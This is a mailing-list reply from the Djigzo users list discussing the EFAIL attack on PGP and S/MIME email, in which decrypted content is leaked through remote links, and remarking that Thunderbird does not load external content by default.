Zitat von Martijn Brinkers via Users <users@lists.djigzo.com>:
The vulnerability is that an attacker can create an email containing
previously encrypted content which is then decrypted. The decrypted
content however is embedded into a link (image, css etc.). If the
mail client then tries to retrieve the remote link, it sends the URL
(which contains part of the email). The attacked then retrieves the
link and can extract the text.
Hm, ok. This will be an even more bogus attack i guess. I was
suspecting something like a advanced padding oracle attack used to
decrypt the message, but they simply trick the client to decrypt AND
send back the content.
HTML e-mail is a security nightmare, automatically loading external
content is even worse and encrypting the whole shit does not solved
the problem at all. So nothing really new in this case.
As stated here : https://www.efail.de/
What are the EFAIL attacks?
The EFAIL attacks break PGP and S/MIME email encryption by coercing
clients into sending the full plaintext of the emails to the attacker.
But at least for Thunderbird one have to alter the default setting to
automatically load external content.
_______________________________________________
Users mailing list
Users@lists.djigzo.com
https://lists.djigzo.com/lists/listinfo/users